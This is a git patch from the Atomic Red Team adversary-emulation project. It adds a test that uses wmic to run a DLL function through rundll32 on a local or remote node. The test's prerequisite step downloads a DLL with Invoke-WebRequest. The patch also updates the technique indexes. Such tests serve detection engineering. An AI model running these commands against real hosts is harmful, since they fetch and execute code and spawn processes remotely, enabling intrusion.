From b66dfc70012e8bfb5451370516a6e8d75e82eebb Mon Sep 17 00:00:00 2001
From: CircleCI Atomic Red Team doc generator
Date: Thu, 9 Sep 2021 20:59:14 +0000
Subject: [PATCH] Generate docs from job=generate_and_commit_guids_and_docs branch=master [skip ci]
---
 atomics/Indexes/Indexes-CSV/index.csv | 1 +
 atomics/Indexes/Indexes-CSV/windows-index.csv | 1 +
 atomics/Indexes/Indexes-Markdown/index.md | 1 +
 .../Indexes/Indexes-Markdown/windows-index.md | 1 +
 atomics/Indexes/index.yaml | 37 +++++++++++++
 atomics/T1047/T1047.md | 53 +++++++++++++++++++
 6 files changed, 94 insertions(+)
diff --git a/atomics/Indexes/Indexes-CSV/index.csv b/atomics/Indexes/Indexes-CSV/index.csv
index 6b83552d..14563449 100644
--- a/atomics/Indexes/Indexes-CSV/index.csv
+++ b/atomics/Indexes/Indexes-CSV/index.csv
@@ -885,6 +885,7 @@ execution,T1047,Windows Management Instrumentation,5,WMI Execute Local Process,b
 execution,T1047,Windows Management Instrumentation,6,WMI Execute Remote Process,9c8ef159-c666-472f-9874-90c8d60d136b,command_prompt
 execution,T1047,Windows Management Instrumentation,7,Create a Process using WMI Query and an Encoded Command,7db7a7f9-9531-4840-9b30-46220135441c,command_prompt
 execution,T1047,Windows Management Instrumentation,8,Create a Process using obfuscated Win32_Process,10447c83-fc38-462a-a936-5102363b1c43,powershell
+execution,T1047,Windows Management Instrumentation,9,WMI Execute rundll32,00738d2a-4651-4d76-adf2-c43a41dfb243,powershell
 lateral-movement,T1021.003,Distributed Component Object Model,1,PowerShell Lateral Movement using MMC20,6dc74eb1-c9d6-4c53-b3b5-6f50ae339673,powershell
 lateral-movement,T1550.002,Pass the Hash,1,Mimikatz Pass the Hash,ec23cef9-27d9-46e4-a68d-6f75f7b86908,command_prompt
 lateral-movement,T1550.002,Pass the Hash,2,crackmapexec Pass the Hash,eb05b028-16c8-4ad8-adea-6f5b219da9a9,command_prompt
diff --git a/atomics/Indexes/Indexes-CSV/windows-index.csv b/atomics/Indexes/Indexes-CSV/windows-index.csv
index a1afbe5c..73dbd93e 100644
--- a/atomics/Indexes/Indexes-CSV/windows-index.csv
+++ b/atomics/Indexes/Indexes-CSV/windows-index.csv
@@ -625,6 +625,7 @@ execution,T1047,Windows Management Instrumentation,5,WMI Execute Local Process,b
 execution,T1047,Windows Management Instrumentation,6,WMI Execute Remote Process,9c8ef159-c666-472f-9874-90c8d60d136b,command_prompt
 execution,T1047,Windows Management Instrumentation,7,Create a Process using WMI Query and an Encoded Command,7db7a7f9-9531-4840-9b30-46220135441c,command_prompt
 execution,T1047,Windows Management Instrumentation,8,Create a Process using obfuscated Win32_Process,10447c83-fc38-462a-a936-5102363b1c43,powershell
+execution,T1047,Windows Management Instrumentation,9,WMI Execute rundll32,00738d2a-4651-4d76-adf2-c43a41dfb243,powershell
 exfiltration,T1020,Automated Exfiltration,1,IcedID Botnet HTTP PUT,9c780d3d-3a14-4278-8ee5-faaeb2ccfbe0,powershell
 exfiltration,T1041,Exfiltration Over C2 Channel,1,C2 Data Exfiltration,d1253f6e-c29b-49dc-b466-2147a6191932,powershell
 exfiltration,T1048.003,Exfiltration Over Unencrypted/Obfuscated Non-C2 Protocol,2,Exfiltration Over Alternative Protocol - ICMP,dd4b4421-2e25-4593-90ae-7021947ad12e,powershell
diff --git a/atomics/Indexes/Indexes-Markdown/index.md b/atomics/Indexes/Indexes-Markdown/index.md
index 3d23da0b..06c808ec 100644
--- a/atomics/Indexes/Indexes-Markdown/index.md
+++ b/atomics/Indexes/Indexes-Markdown/index.md
@@ -1538,6 +1538,7 @@
 - Atomic Test #6: WMI Execute Remote Process [windows]
 - Atomic Test #7: Create a Process using WMI Query and an Encoded Command [windows]
 - Atomic Test #8: Create a Process using obfuscated Win32_Process [windows]
+ - Atomic Test #9: WMI Execute rundll32 [windows]
 # lateral-movement
 - T1550.001 Application Access Token [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
diff --git a/atomics/Indexes/Indexes-Markdown/windows-index.md b/atomics/Indexes/Indexes-Markdown/windows-index.md
index ff41b5c4..8230c2f0 100644
--- a/atomics/Indexes/Indexes-Markdown/windows-index.md
+++ b/atomics/Indexes/Indexes-Markdown/windows-index.md
@@ -1105,6 +1105,7 @@
 - Atomic Test #6: WMI Execute Remote Process [windows]
 - Atomic Test #7: Create a Process using WMI Query and an Encoded Command [windows]
 - Atomic Test #8: Create a Process using obfuscated Win32_Process [windows]
+ - Atomic Test #9: WMI Execute rundll32 [windows]
 # exfiltration
 - [T1020 Automated Exfiltration](../../T1020/T1020.md)
diff --git a/atomics/Indexes/index.yaml b/atomics/Indexes/index.yaml
index ab4b4b3e..7837f864 100644
--- a/atomics/Indexes/index.yaml
+++ b/atomics/Indexes/index.yaml
@@ -63763,6 +63763,43 @@ execution:
 cleanup_command: |
 $CleanupClass = New-Object Management.ManagementClass(New-Object Management.ManagementPath("#{new_class}"))
 $CleanupClass.Delete()
+ - name: WMI Execute rundll32
+ auto_generated_guid: '00738d2a-4651-4d76-adf2-c43a41dfb243'
+ description: 'This test uses wmic.exe to execute a DLL function using rundll32.
+ Specify a valid value for remote IP using the node parameter.
+
+'
+ supported_platforms:
+ - windows
+ input_arguments:
+ node:
+ description: Ip Address
+ type: String
+ default: 127.0.0.1
+ dll_to_execute:
+ description: Path to DLL.
+ type: String
+ default: "$env:TEMP\\calc.dll"
+ function_to_execute:
+ description: Name of DLL function to call
+ type: String
+ default: StartW
+ dependency_executor_name: powershell
+ dependencies:
+ - description: DLL with function to execute must exist on disk at specified
+ location (#{dll_to_execute})
+ prereq_command: 'if (Test-Path #{dll_to_execute}) {exit 0} else {exit 1}'
+ get_prereq_command: 'Invoke-WebRequest "https://github.com/redcanaryco/atomic-red-team/tree/master/atomics/T1047/bin/calc.dll"
+ -OutFile "#{dll_to_execute}"
+
+'
+ executor:
+ command: 'wmic /node:#{node} process call create "rundll32.exe #{dll_to_execute}
+ #{function_to_execute}"
+
+'
+ cleanup_command: taskkill /f /im calculator.exe
+ name: powershell
 lateral-movement:
 T1550.001:
 technique:
diff --git a/atomics/T1047/T1047.md b/atomics/T1047/T1047.md
index 7b2812cb..cab06d68 100644
--- a/atomics/T1047/T1047.md
+++ b/atomics/T1047/T1047.md
@@ -22,6 +22,8 @@ An adversary can use WMI to interact with local and remote systems and use it as
 - [Atomic Test #8 - Create a Process using obfuscated Win32_Process](#atomic-test-8---create-a-process-using-obfuscated-win32_process)
+- [Atomic Test #9 - WMI Execute rundll32](#atomic-test-9---wmi-execute-rundll32)
+
@@ -304,4 +306,55 @@ $CleanupClass.Delete()
+
+
+
+## Atomic Test #9 - WMI Execute rundll32
+This test uses wmic.exe to execute a DLL function using rundll32. Specify a valid value for remote IP using the node parameter.
+
+**Supported Platforms:** Windows
+
+
+**auto_generated_guid:** 00738d2a-4651-4d76-adf2-c43a41dfb243
+
+
+
+
+
+#### Inputs:
+| Name | Description | Type | Default Value |
+|------|-------------|------|---------------|
+| node | Ip Address | String | 127.0.0.1|
+| dll_to_execute | Path to DLL. | String | $env:TEMP\calc.dll|
+| function_to_execute | Name of DLL function to call | String | StartW|
+
+
+#### Attack Commands: Run with `powershell`!
+
+
+```powershell
+wmic /node:#{node} process call create "rundll32.exe #{dll_to_execute} #{function_to_execute}"
+```
+
+#### Cleanup Commands:
+```powershell
+taskkill /f /im calculator.exe
+```
+
+
+
+#### Dependencies: Run with `powershell`!
+##### Description: DLL with function to execute must exist on disk at specified location (#{dll_to_execute})
+##### Check Prereq Commands:
+```powershell
+if (Test-Path #{dll_to_execute}) {exit 0} else {exit 1}
+```
+##### Get Prereq Commands:
+```powershell
+Invoke-WebRequest "https://github.com/redcanaryco/atomic-red-team/tree/master/atomics/T1047/bin/calc.dll" -OutFile "#{dll_to_execute}"
+```
+
+
+
+